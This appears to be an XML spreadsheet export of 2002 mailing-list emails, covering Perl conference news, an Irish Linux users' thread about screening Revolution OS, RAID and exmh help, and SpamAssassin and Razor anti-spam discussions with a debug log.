    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Spouses afternoon at YAPC::Europe\n\n+--------------------------------------------------------------------+\n| Spouses afternoon at YAPC::Europe                                  |\n|   posted by ziggy on Wednesday August 14, @19:44 (news)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]Richard Foley writes "On Thursday, September 19th, we are running an\neasy walking tour around the city of Munich, for all those long-suffering\npartners coming to YAPC::Europe, as a sort of treat for putting up with\nthe other half going to this very interesting event. Just to be clear:\nwe're not after any conference participant/attendees on this, only those\nwho are waiting until all the perl talk has finished (perl-widows and the\nlike). We'd like to have an idea of numbers, please, ahead of time, so:\n[1]RSVP. Thanks!"\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.yapc.org[/URL]\n    1. mailto:Richard.Foley@t-online.de\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yapc.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 15 Aug 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-08-15</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nSpouses afternoon at YAPC::Europe\n    posted by ziggy on Wednesday August 14, @19:44 (new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Rick Moen &lt;rick@linuxmafia.com&gt;\nFrom: Alan Horkan &lt;horkana@tcd.ie&gt;\nDate: Thu, 15 Aug 2002 00:46:23 +0100 (IST)</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 00:46:23 +0100 (IST)</t>
  </si>
  <si>
    <t>duly noted definately would make the extra effort to talk directly with these people and mention to the IFC (local arts cinema) about a more approriate showing. Would enough people in ILUG be interested to cover the possible costs of a showing some Saturday afternoon/morning. Anyway this is distant future anyway i have too much on my plate already. I hope the DVD they produce wont be region coded, damned anti-consumer cartels and monoplistic tendencies of coporate greed. Is this the same film the 2600 people are always going on about or is that something else? Later Alan On Wed, 14 Aug 2002, Rick Moen wrote: &gt; Date: Wed, 14 Aug 2002 12:02:13 -0700 &gt; From: Rick Moen  &gt; To: Alan Horkan  &gt; Cc: social@linux.ie &gt; Subject: Re: [ILUG] Linux: the film. &gt; &gt; [Moved from the ILUG list.  Not _entirely_ offlist as requested, but &gt; close enough.] &gt; &gt; Quoting Alan Horkan (horkana@tcd.ie): &gt; &gt; &gt; More likely we would try and get it when it comes out on video/dvd and &gt; &gt; show it then (which AFAIK is legal as we are non profit private &gt; &gt; organisation having a private showing and not charging our members for &gt; &gt; the showing. any opinions on the legality of this should be sent &gt; &gt; offlist). &gt; &gt; &gt; One bloke's opinion: &gt; &gt; &gt; Date: Sat, 01 Jun 2002 00:18:29 -0700 &gt; From: "J.T.S. Moore"  &gt; Reply-To: jtsmoore@pacificnet.net &gt; To: Marc MERLIN , &gt;    Daniel Isacc Walker  &gt; CC: svlug@svlug.org, Rick Moen , sluglug@sluglug.ucsc.edu, &gt;    Peter Belew , "Eric A. Perlman" , &gt;    i3e-off@cse.ucsc.edu, slug-web@sluglug.ucsc.edu &gt; Subject: REVOLUTION OS is now authorized for UC Santa Cruz screening &gt; &gt; To all, &gt; &gt; I have read the series of e-mails related to the unauthorized UC Santa &gt; Cruz screening that was scheduled for June 1.  I sincerely appreciate &gt; IEEE's good faith effort to correct the mistake. &gt; &gt; Consequently, so as not to inconvenience the people planning to attend &gt; the screening, I want to give IEEE and SlugLUG permission to screen &gt; REVOLUTION OS at 1 PM on June 1.  I would ask the members of SVLUG to &gt; hold off on attending the screening for the simple reason that I am &gt; trying to get REVOLUTION OS booked into the Camera 3 in San Jose, and I &gt; would prefer that SVLUG's members have a chance to see a nice 35mm print &gt; of the film.  If my distributor is unable to book the film into a &gt; theater in the Bay Area, I promise that I will work with SVLUG to &gt; quickly set up a screening for its members. &gt; &gt; I realize there may be some members of SlugLUG who are unhappy that I &gt; originally requested that they not hold an unauthorized screening of &gt; REVOLUTION OS.  There are several reasons why I made the request, and &gt; none of them have anything to do with me wanting to be a jerk. &gt; &gt; One SlugLUG member commented that it was odd that a movie about the Open &gt; Source movement would not be available for open viewings.  Another &gt; SlugLUG member remarked that my request smacks of Bill Gates's Open Letter &gt; to Hobbyists. &gt; &gt; The bottomline is that I did make a film about the Open Source movement, &gt; but to assume that automatically means that the film is itself Open &gt; Sourced seems to be a little bit of a stretch.  If I made a movie about &gt; the history of vegetarianism that would not automatically mean I'm a &gt; vegetarian. &gt; &gt; I simply thought Open Source and Free Software were compelling subjects &gt; worth exploring and documenting.  As a result, I came to admire many &gt; aspects of the Open Source movement and chose to focus the documentary &gt; on the movement's positive history.  However, I do not think I should be &gt; punished for telling the story of Free Software and Open Source by &gt; having my intellectual property misappropriated.   More practically, my &gt; feelings about Open Sourcing REVOLUTION OS are abundantly clear when you &gt; see the explicit copyright notice at the end of the film's credits. &gt; &gt; I realize that making a videotape copy for personal use from a TV airing &gt; is considered fair use.  I believe in a healthy fair use doctrine. &gt; However, there is a big difference between viewing your personal copy at &gt; home with a few friends and holding a publicly advertised screening on a &gt; university campus.  So I freely admit my objection to unauthorized &gt; screenings of REVOLUTION OS does echo Bill Gates's letter.  Personally, I &gt; believe that the creator of a piece of intellectual property should &gt; retain the choice to Open Source their IP.  If the Open Source movement &gt; is not voluntary then it is really just piracy. &gt; &gt; One of the reasons I am concern with unauthorized group screenings of &gt; the film, is that my distributor is planning in a few weeks to begin &gt; selling VHS copies of the film for educational/institutional use with a &gt; license permitting noncommercial large group screenings.  We hope to use &gt; the money from these sales to fund the authoring and replication of the &gt; DVD.  I want to release the DVD as soon as possible, but I cannot afford &gt; to take on anymore REVOLUTION OS-related debt.  Thus the importance of &gt; preserving the educational/institutional market. &gt; &gt; Frequently, I will read comments on Slashdot and other mailing lists &gt; that justify the piracy of music on the grounds that it benefits the &gt; artists and only hurts the greedy record labels.  Well, in the case of &gt; REVOLUTION OS there is no multinational media conglomerate to punish. &gt; It's just me.  I made and financed the film on my own.  I have worked &gt; full-time for almost three years without a salary.  The only way I will &gt; get out of debt and have a chance to make another film is if people seek &gt; out legal opportunities to view REVOLUTION OS. &gt; &gt; I truly appreciate the enthusiasm of the Open Source community for &gt; REVOLUTION OS, and I am grateful that people do want to see it.  If you &gt; will just bare with me, I will figure out a way for all interested &gt; persons to legally view it. &gt; &gt; I hope the dust up over the unauthorized, and now authorized, screening &gt; at UC Santa Cruz has not inconvenienced anyone. &gt; &gt; Sincerely, &gt; &gt; J.T.S. Moore &gt; Director, REVOLUTION OS &gt; --  Irish Linux Users' Group Social Events: social@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie, "John P. Looney" &lt;valen@tuatha.org&gt;\nFrom: Colm Buckley &lt;colm@tuatha.org&gt;\nDate: Thu, 15 Aug 2002 00:04:36 +0100</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 00:04:36 +0100</t>
  </si>
  <si>
    <t>ilug@linux.ie, "John P. Looney" &lt;valen@tuatha.org&gt;</t>
  </si>
  <si>
    <t>On Wed 14 Aug 2002 08:42, John P. Looney wrote:\n\n&gt; It likely means that I was just lucky I put the failed-disk\n&gt; directive after the raid-disk one :)\n\nExtremely lucky.  The other way around would have toasted your\nexisting volume.\n\n\n&gt; Anyway. It's doesn't quite boot right, with /=/dev/md0 in fstab. On\n&gt; boot, I see:\n\nIn order to autodetect soft RAID volumes at boot, you need to set the\npartition type on all the relevant raw disk partitions to 0xFD.  I'm\nnot sure about the initrd stuff; as I don't use it myself.\n\n           Colm\n\n-- \nColm Buckley | colm@tuatha.org | +353 87 2469146 | [URL]www.colm.buckley.name[/URL]\nOffice closed on Mondays.  If you want anything on Monday, come on Tuesday.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Tony Nugent &lt;tony@linuxworks.com.au&gt;\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Thu, 12 Sep 2002 23:26:33 -0500</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 23:26:33 -0500</t>
  </si>
  <si>
    <t>Re: Linking message [was: Re: Patch to complete a change...]</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Tony" == Tony Nugent wrote:\n\n  Tony&gt; (In essence: is there a way to mark a destination folder\n  Tony&gt; for a message link or move without actually doing a move\n  Tony&gt; or link, I couldn't see anything obvious).\n\n1) Right click on the folder label in the folder list\n\n2) In the main window, the "+" key puts you into a "change \n   folder" mode (the first time you use it after starting exmh),\n   hit a second + and you go to "set a target" mode.  Type a few\n   characters of the folder name and hit space for autocomplete.\n\n--Hal\n\nHow's spring shaping up "down under"?\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Tom &lt;tomwhore@slack.net&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Thu, 12 Sep 2002 22:08:47 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 22:08:47 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: dylsexics of the wrold, untie!</t>
  </si>
  <si>
    <t>On Thu, 12 Sep 2002, Tom wrote:\n\n&gt; Yep, that ws the plan all alng with my typos, I am the only one to be\n&gt; consistently fighting the evls of da vore.\n\nWell, yeah, but there's an easier way.\n	\n	[URL]http://www.google.com[/URL]\n\nThere's still MITM, but it requires a far higher capability, and is easier\nto detect once you go beyond the scamed interaction of two parties, since\nbeing manipulative in principle.\n\nIf you run your own mailserver, or have a say in what your host does, make \nhim adopt STARTTLS.</t>
  </si>
  <si>
    <t>http://www.google.com</t>
  </si>
  <si>
    <t>To: SpamAssassin &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: Fred Inklaar &lt;opslag@inklaar.net&gt;\nDate: Thu, 12 Sep 2002 20:50:28 +0200</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 20:50:28 +0200</t>
  </si>
  <si>
    <t>Fred Inklaar &lt;opslag@inklaar.net&gt;</t>
  </si>
  <si>
    <t>SpamAssassin &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Reject, Blackhole, or Fake No-User</t>
  </si>
  <si>
    <t>Op 12-09-2002 00:35 schreef Ellen Clary (ellen@dgi.com):\n\n&gt;&gt; Then there is a third possibility. Instead of returning a 550 code\n&gt;&gt; indicating you're on to the spammer, fake a 5.1.1 response which is\n&gt;&gt; saying "mailbox does not exist." This would be in the hopes that some\n&gt;&gt; spammers out there actually remove names reported as non-existent from\n&gt;&gt; their lists. I know, a slim hope, but even if only a few do, it can\n&gt;&gt; lower the incidence.\n&gt; \n&gt; They don't, I can guarantee that.  Quite a few spamtraps nowadays\n&gt; operate by 5nn'ing for 6 months in the hope of getting legit mailers\n&gt; to remove bouncing addrs from lists;  then after 6 months, they just\n&gt; spamtrap all incoming mail to those addrs.  (unfortunately a lot of\n&gt; legit mailers don't bother cleaning their lists either.)\n\nMost spammers don't check reply codes at all, they just send out as many\nmails as their system will hold without checking for any confirmation.\n\nA trick to lower spam reception was dicussed on the postfix mailing list\nsome time ago: answer all incoming mail with a 4xx temporary error code when\nit is offered the first time, and accept it the second time. Apparently most\nmass-emailers don't even try to deliver a second time.\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ler+geocache@lerctr.org&gt;\nFrom: "Geocaching Notify Bot" &lt;notify@geocaching.com&gt;\nDate: Thu, 12 Sep 2002 19:24:11 -0700</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 19:24:11 -0700</t>
  </si>
  <si>
    <t>Greetings from Geocaching.com -\n\n\nRecent caches in your area...\n\n9/10/2002 (Texas)\nHorsin' Around by Shellyfish &amp; Jerry227\n(Traditional Cache) (GC8CA0) (19.44 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n10/27/2002 (Texas)\nNTGA Org. Meeting/Class by Wolf Song\n(Event Cache) (GC81C2) (25.8 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/22/2002 (Texas)\nNTGA Organizational Meeting/Class by Wolf Song\n(Event Cache) (GC81C1) (25.8 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/8/2002 (Texas)\nThe Nostaglia Zone by VeggieDog\n(Traditional Cache) (GC8C58) (26.83 miles W)\n[URL]http://www.geocaching.com[/URL]\n\n9/7/2002 (Texas)\nRainy Day Cache by Ma Bell  (named by geovamp and msdark)\n(Traditional Cache) (GC8B06) (28.92 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/11/2002 (Texas)\nFire Station #7:  In Honor of 9-11-2001 by Arcane Cacher (adopted by Web-ling 8/30/02)\n(Traditional Cache) (GC26F) (33.46 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/9/2002 (Texas)\nTired of Bronze by GeoGoddess and Waterlily\n(Virtual Cache) (GC8D03) (41.65 miles W)\n[URL]http://www.geocaching.com[/URL]\n\n9/10/2002 (Texas)\nThe Island by tomboy\n(Virtual Cache) (GC8CAC) (42.87 miles S)\n[URL]http://www.geocaching.com[/URL]\n\n9/28/2002 (Texas)\nDFW Field Day #1 by loubob57\n(Event Cache) (GC8644) (47.92 miles W)\n[URL]http://www.geocaching.com[/URL]\n\n9/5/2002 (Texas)\nPirates Booty by Nitehawker\n(Traditional Cache) (GC8A34) (50.51 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/7/2002 (Texas)\nSunshine at Weatherford by sportrak ,Black_ronin\n(Traditional Cache) (GC8ADB) (69.18 miles W)\n[URL]http://www.geocaching.com[/URL]\n\n9/9/2002 (Texas)\nLeave It to Beaver by Tweedler\n(Traditional Cache) (GC8C6F) (84.14 miles SE)\n[URL]http://www.geocaching.com[/URL]\n\n\nYour account name is 'lrosenman'.  If you would like to be removed from this\nlist, please log into the web site and uncheck cache notifications through\nthe "modify your account" link on your "my cache page".</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Will Glynn" &lt;delta407@lerfjhax.com&gt;\nDate: Thu, 12 Sep 2002 19:23:46 -0500</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 19:23:46 -0500</t>
  </si>
  <si>
    <t>"Will Glynn" &lt;delta407@lerfjhax.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Re: Collision of hashes?</t>
  </si>
  <si>
    <t>To continue the subject on an otherwise unrelated note, the following personal correspondence was just flagged as spam: The following is a slightly modified e-mail message trapped in a server-wide spam box. ------ NEWSPAPER????? any time estimate when we can expect you home? dad                     &lt;********@**********       To: &lt;*************@***************&gt;                     *********&gt;                 cc:                                                Subject:     Oh, yeah                     09/12/2002 12:43 PM I have to stay after school today so I can work on the school newspaper (layout) -- Nords will bring me home later than usual. ------ I don't know how to explain this one. --Will ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Chris Haun &lt;chris@noskillz.com&gt;\nFrom: Michael Watson &lt;scruz_mike@yahoo.com&gt;\nDate: Thu, 12 Sep 2002 16:53:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 16:53:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>Michael Watson &lt;scruz_mike@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Re: From salon.com - Forbidden thoughts about 9/11</t>
  </si>
  <si>
    <t>--0-1051763016-1031874793=:3397 Content-Type: text/plain; charset=us-ascii I am delurking to comment on the Salon article. I just wanted to say that I am grateful they choose not to publish my forbidden thought. I sent it in a couple of days before the 9/11 commeration. If I had just watched the sentimental network and cable shows on 9/11 my cynical thoughts would have remain unchanged. However, I watch the Frontline show "Faith and Doubt at Ground Zero" on PBS. That show tackled head on, with much more courage than I have seen elsewhere, the larger questions about good and evil, about art as an alternate religion (Karlheinz Stockhausen -- 9/11 was a great work of art), and especially the question about how religion has a darker side which when carried to fanatic extremes tends to negate the humanity of the non-believers. I am not a religious person but I stunned at the scope of this program. It talked about the Lutheran minister who spoke at Yankees Stadium on a podium with other religious leaders present who was charged with heresy by his own church for promoting the idea that all religions are equal (presumably the Lutherans have the one true path?). Thanks for listening, I just felt like I needed to put the word out about this program. My shallow comment on Salon and others like it (my boyfriend and I had sex while the towers collapsed) gives me pause about how some of us tend to harden ourselves to the suffering of others. Mike  Chris Haun wrote:i though this was all rather interesting, first bit of 9/11 coverage that  i've liked. [URL]http://www.salon.com[/URL] Chris --------------------------------- Do you Yahoo!? Yahoo! News - Today's headlines --0-1051763016-1031874793=:3397 Content-Type: text/html; charset=us-ascii I am delurking to comment on the Salon article. I just wanted to say that I am grateful they choose not to publish my forbidden thought. I sent it in a couple of days before the 9/11 commeration. If I had just watched the sentimental network and cable shows on 9/11 my cynical thoughts would have remain unchanged. However, I watch the Frontline show "Faith and Doubt at Ground Zero" on PBS. That show tackled head on, with much more courage than I have seen elsewhere, the larger questions about good and evil, about art as an alternate religion (Karlheinz Stockhausen -- 9/11 was a great work of art), and especially the question about how religion has a darker side which when carried to fanatic extremes tends to negate the humanity of the non-believers. I am not a religious person but I stunned at the scope of this program. It talked about the Lutheran minister who spoke at Yankees Stadium on a podium with other religious leaders present who was charged with heresy by his own church for promoting the idea that all religions are equal (presumably the Lutherans have the one true path?). Thanks for listening, I just felt like I needed to put the word out about this program. My shallow comment on Salon and others like it (my boyfriend and I had sex while the towers collapsed) gives me pause about howÂ someÂ of usÂ tend to harden ourselves to the suffering of others. Mike Â Chris Haun wrote: i though this was all rather interesting, first bit of 9/11 coverage that i've liked.[URL]http://www.salon.com[/URL] you Yahoo!? Yahoo! News - Today's headlines --0-1051763016-1031874793=:3397--</t>
  </si>
  <si>
    <t>http://www.salon.com http://www.salon.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: George Michaelson &lt;ggm@apnic.net&gt;\nDate: Thu, 12 Sep 2002 12:19:29 +0000</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 12:19:29 +0000</t>
  </si>
  <si>
    <t>George Michaelson &lt;ggm@apnic.net&gt;</t>
  </si>
  <si>
    <t>bad focus/click behaviours</t>
  </si>
  <si>
    <t>I am a (tv)twm user. when I snarf text into my mouse cut buffer, and then attempt to inject it into the exmh input windows for comp/repl, the 'point' is often an apparently random place in the text pane, not where I think I have current flashing cursor.  I usually wipe out any of To:/Subject:/ with the text. Its often not even beginning of line denoted, ie its an unexplicable number of char spaces in to the text where it inserts,  What am I doing wrong in either X, WM, shell, EXMH which is causing this? cheers 	-George _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Paul Fries" &lt;paul@cwie.net&gt;\nDate: Thu, 12 Sep 2002 12:07:22 -0700</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 12:07:22 -0700</t>
  </si>
  <si>
    <t>"Paul Fries" &lt;paul@cwie.net&gt;</t>
  </si>
  <si>
    <t>RE: [SAtalk] 2.41/2.50 spamd/spamc problem</t>
  </si>
  <si>
    <t>Heh. RTFM.. Sorry about that.\n\nYep, that did the trick.\n\nThanks for the help!\n\nRegards,\nPaul Fries\npaul@cwie.net\n\n-----Original Message-----\nFrom: spamassassin-talk-admin@example.sourceforge.net\n[mailto:spamassassin-talk-admin@lists.sourceforge.net] On Behalf Of\nVince Puzzella\nSent: Thursday, September 12, 2002 11:23 AM\nTo: Paul Fries; spamassassin-talk@example.sourceforge.net\nSubject: RE: [SAtalk] 2.41/2.50 spamd/spamc problem\n\ndefang_mime 0\n\n-----Original Message-----\nFrom: Paul Fries [mailto:paul@cwie.net] \nSent: Thursday, September 12, 2002 2:12 PM\nTo: spamassassin-talk@example.sourceforge.net\nSubject: [SAtalk] 2.41/2.50 spamd/spamc problem\n\n\nI noticed that after upgrading to 2.41 (or 2.50) from 2.31, the -F\noption was removed from spamd. \n\nThis is fine because all of the HTML format mail seems to arrive\nproperly. However, messages that get tagged as Spam arrive as just html\nsource.\n\nIs there any way around this? I would like all HTML/RTF messages to\nretain their formatting even if they are flagged as spam. I would\naccomplish this on 2.31 by using the "-F 0" flag when starting spamd.\n\nThanks!\n\nRegards,\nPaul Fries\npaul@cwie.net\nCWIE LLC \n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL] _______________________________________________\nSpamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nFrom: David Raistrick &lt;drais@wow.atlasta.net&gt;\nDate: Thu, 12 Sep 2002 09:06:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 09:06:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>[Razor-users] no positive razor hits?</t>
  </si>
  <si>
    <t>On Tue, 10 Sep 2002, Rose, Bobby wrote: &gt; Use the sample-spam.txt from Spamassassin and do a "razor-check -d &lt; &gt; sample-spam.txt" Interesting.  I just upgraded to razor-agents 2.14 yesterday, ran razor-admin -register.  I to am seeing that I'm not getting any positives from razor.  Including the sample-spam.txt's from spamassassin 2.41, 2.31, and 2.20. Any suggestions?  thanks. -d output below maxwell:/var/qmail/alias/gb-users%# razor-check -d &lt; /usr/local/src/Mail-SpamAssassin-2.20/sample-spam.txt  Razor-Log: Computed razorhome from env: /root/.razor  Razor-Log: Found razorhome: /root/.razor  Razor-Log: No /root/.razor/razor-agent.conf found, skipping.  Razor-Log: No razor-agent.conf found, using defaults.  Sep 12 12:04:13.785852 check[52238]: [ 1] [bootup] Logging initiated LogDebugLevel=9 to stdout Sep 12 12:04:13.787113 check[52238]: [ 5] computed razorhome=/root/.razor, conf=, ident=/root/.razor/identity-ruqVa5jbuS Sep 12 12:04:13.787442 check[52238]: [ 2]  Razor-Agents v2.14 starting razor-check -d Sep 12 12:04:13.789903 check[52238]: [ 9] uname -a: FreeBSD maxwell.gta.com 4.5-RELEASE-p3 FreeBSD 4.5-RELEASE-p3 #0: Wed May 22 14:52:29 EDT 2002     root@maxwell.gta.com:/usr/src/sys/compile/maxwell i386 Sep 12 12:04:13.790480 check[52238]: [ 8] reading straight RFC822 mail from  Sep 12 12:04:13.791397 check[52238]: [ 6] read 1 mail Sep 12 12:04:13.791917 check[52238]: [ 8] Client supported_engines: 1 2 3 4 Sep 12 12:04:13.792948 check[52238]: [ 8]  prep_mail done: mail 1 headers=1432, mime0=3139 Sep 12 12:04:13.793639 check[52238]: [ 6] skipping whitelist file (empty?): /root/.razor/razor-whitelist Sep 12 12:04:13.794295 check[52238]: [ 5] read_file: 1 items read from /root/.razor/servers.discovery.lst Sep 12 12:04:13.794871 check[52238]: [ 5] read_file: 1 items read from /root/.razor/servers.nomination.lst Sep 12 12:04:13.795382 check[52238]: [ 5] read_file: 3 items read from /root/.razor/servers.catalogue.lst Sep 12 12:04:13.796047 check[52238]: [ 9] Assigning defaults to honor.cloudmark.com Sep 12 12:04:13.796456 check[52238]: [ 9] Assigning defaults to apt.cloudmark.com Sep 12 12:04:13.796829 check[52238]: [ 9] Assigning defaults to fire.cloudmark.com Sep 12 12:04:13.797180 check[52238]: [ 9] Assigning defaults to truth.cloudmark.com Sep 12 12:04:13.798322 check[52238]: [ 5] read_file: 11 items read from /root/.razor/server.apt.cloudmark.com.conf Sep 12 12:04:13.799188 check[52238]: [ 5] read_file: 11 items read from /root/.razor/server.honor.cloudmark.com.conf Sep 12 12:04:13.799866 check[52238]: [ 5] 96778 seconds before closest server discovery Sep 12 12:04:13.800342 check[52238]: [ 6] apt.cloudmark.com is a Catalogue Server srl 51; computed min_cf=1, Server se: 0A Sep 12 12:04:13.800818 check[52238]: [ 8] Computed supported_engines: 2 4 Sep 12 12:04:13.801167 check[52238]: [ 8] Using next closest server apt.cloudmark.com:2703, cached info srl 51 Sep 12 12:04:13.801513 check[52238]: [ 8] mail 1 Subject: Home Based Business for Grownups Sep 12 12:04:13.805467 check[52238]: [ 6] preproc: mail 1.0 went from 3139 bytes to 3100  Sep 12 12:04:13.805878 check[52238]: [ 6] computing sigs for mail 1.0, len 3100 Sep 12 12:04:13.809475 check[52238]: [ 5] Connecting to apt.cloudmark.com ... Sep 12 12:04:18.587441 check[52238]: [ 8] Connection established Sep 12 12:04:18.587929 check[52238]: [ 4] apt.cloudmark.com &gt;&gt; 29 server greeting: sn=C&amp;srl=51&amp;ep4=7542-10&amp;a=l Sep 12 12:04:18.588562 check[52238]: [ 6] apt.cloudmark.com is a Catalogue Server srl 51; computed min_cf=1, Server se: 0A Sep 12 12:04:18.589041 check[52238]: [ 8] Computed supported_engines: 2 4 Sep 12 12:04:18.589432 check[52238]: [ 8] mail 1.0 e2 sig: PGFfFte87P3Ve-CPTdu3NWgiBikA Sep 12 12:04:18.589751 check[52238]: [ 8] mail 1.0 e4 sig: k6oGZsa1AvVolyvalWx2AACdWb8A Sep 12 12:04:18.590103 check[52238]: [ 8] preparing 2 queries Sep 12 12:04:18.590638 check[52238]: [ 8] sending 1 batches Sep 12 12:04:18.591087 check[52238]: [ 4] apt.cloudmark.com &lt;&lt; 96 Sep 12 12:04:18.591324 check[52238]: [ 6] -a=c&amp;e=2&amp;s=PGFfFte87P3Ve-CPTdu3NWgiBikA a=c&amp;e=4&amp;ep4=7542-10&amp;s=k6oGZsa1AvVolyvalWx2AACdWb8A . Sep 12 12:04:19.270870 check[52238]: [ 4] apt.cloudmark.com &gt;&gt; 14 Sep 12 12:04:19.271227 check[52238]: [ 6] response to sent.1 -p=0 p=0 . Sep 12 12:04:19.272130 check[52238]: [ 6] mail 1.0 e=2 sig=PGFfFte87P3Ve-CPTdu3NWgiBikA: sig not found. Sep 12 12:04:19.272449 check[52238]: [ 6] mail 1.0 e=4 sig=k6oGZsa1AvVolyvalWx2AACdWb8A: sig not found. Sep 12 12:04:19.272760 check[52238]: [ 7] method 5: mail 1.0: no-contention part, spam=0 Sep 12 12:04:19.273012 check[52238]: [ 7] method 5: mail 1: a non-contention part not spam, mail not spam Sep 12 12:04:19.273257 check[52238]: [ 3] mail 1 is not known spam. Sep 12 12:04:19.273578 check[52238]: [ 5] disconnecting from server apt.cloudmark.com Sep 12 12:04:19.273982 check[52238]: [ 4] apt.cloudmark.com &lt;&lt; 5 Sep 12 12:04:19.274203 check[52238]: [ 6] a=q Sep 12 12:04:19.274585 check[52238]: [ 8] razor-check finished successfully. --- david raistrick drais@atlasta.net		[URL]http://www.expita.com[/URL] ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.expita.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Spamassassin Talk" &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Eric Mings" &lt;elm@answers123.com&gt;\nDate: Thu, 12 Sep 2002 09:05:50 -0400</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 09:05:50 -0400</t>
  </si>
  <si>
    <t>"Eric Mings" &lt;elm@answers123.com&gt;</t>
  </si>
  <si>
    <t>"Spamassassin Talk" &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Bayesian and bogofilter</t>
  </si>
  <si>
    <t>&gt;Anyway I'm making good progress and my implementation works reasonably\n&gt;well.  It now seems blindingly clear that we want a tightly-integrated\n&gt;implementation of Naive Bayes spam/nonspam classification.  There are\n&gt;still some things about how to do this right inside SA that I still am\n&gt;figuring out.\n&gt;\n&gt;Dan\n\nThis is very good news! Will this allow for individual spam word file\npreferences when spamassassin is running on a mailserver for multiple\nusers? This would be an outstanding addition if it can be done. Thanks\nmuch for a great project.\n\n-- \nRegards,\n\nEric Mings Ph.D.\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
